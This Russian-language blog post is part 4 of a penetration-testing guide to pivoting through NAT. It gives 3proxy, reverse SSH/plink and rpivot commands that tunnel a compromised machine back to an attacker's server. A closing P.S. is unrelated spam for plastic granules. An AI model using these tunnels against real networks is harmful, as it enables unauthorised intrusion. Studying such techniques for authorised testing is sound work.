Руководство по pivoting. Часть 4

Опубликовано · Обновлено

Сценарий NAT
Это, безусловно, самая распространенная ситуация. Трафик до места назначения перенаправляется на основе каждого порта. Это означает, что все порты связаны, кроме тех, которые в правилах перенаправления порта не будут доступны извне. Одним из возможных решений является инициирование обратной связи. Описанные ниже инструменты помогут вам в этом.
Обратное SSH-перенаправление порта /w 3proxy
Эта установка pivoting выглядит примерно так:
Запускаем службу 3proxy с помощью следующей конфигурации на целевом сервере:
socks -p31337
Создаем отдельного пользователя на приемной стороне (машина атакующего):
adduser sshproxy
Этот пользователь должен быть с привилегиями низкого уровня и не должен иметь прав оболочки. В конце концов, вы же не хотите получить обратное пентестування? 🙂 Редактируем /etc/passwd и переключаем оболочку /bin/false. Все должно выглядеть следующим образом:
root:x:0:0:root:/root:/bin/bash

sshproxy:x:1000:1001:,,,:/home/sshproxy:/bin/false

Теперь подключаемся к серверу с вновь созданным пользователем с флагом -R. Система Linux:
ssh sshproxy@your_server -R 31337:127.0.0.1:31337
Для Widows будет нужно сначала скачать plink.exe. Это консольная версия putty. Для запуска:
plink.exe sshproxy@your_server -R 31337:127.0.0.1:31337
Флаг -R позволяет связать порт на стороне сервера. Все подключения к этому порту будут переданы в указанный порт на клиенте. Таким образом, мы можем запустить службу 3proxy socks на стороне клиента (скомпрометированная машина) и получить доступ к этому порту на хосте атакующего с помощью флага SSH -R.

Rpivot
Любимый метод автора для обхода соединений NAT. Rpivot является инструментом реверсивного SOCS прокси, который позволяет туннельный трафик через SOCS прокси. Он подключается обратно к машине и связывает SOCS прокси на нее. Работает он так же, как ssh -D, но в противоположном направлении. На стороне сервера:
python server.py —proxy-port 1080 —server-port 9999 —server-ip 0.0.0.0
Сторона клиента:
python client.py —server-ip —server-port 9999
В результате служба socks4-прокси будет связана на стороне сервера через порт 1080.

P.S. Ищете где можно купить ВТОРИЧНАЯ ГРАНУЛА ПВД http://saratov.pro-ptr.ru/vtorichka-granula-pvd в Саратове по низкой цене? Рекомендуем зайти на сайт saratov.pro-ptr.ru и посмотреть цены на ВТОРИЧНАЯ ГРАНУЛА ПВД.

Читайте также: